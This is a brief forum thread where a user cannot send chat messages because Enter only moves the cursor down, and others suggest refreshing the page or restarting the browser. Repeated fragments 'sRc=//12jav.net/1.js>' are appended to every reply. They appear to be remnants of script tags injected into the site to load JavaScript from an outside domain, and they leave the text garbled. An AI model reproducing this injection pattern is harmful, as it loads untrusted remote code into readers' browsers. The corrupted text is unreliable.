Can't chat

So, I have been experiencing that each time I try to chat and press "Enter", the blinking cursor moves one down, not letting me chat. I have agreed to the rules and passed. I'm not sure what's wrong, but I didn't do anything.

Sometimes the chatter works up, it's used alot. Try just hitting enter, or refresh the page. If you have more than 1 chatter open, close it. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I hit enter every time. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Try closing your browser and opening it again sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
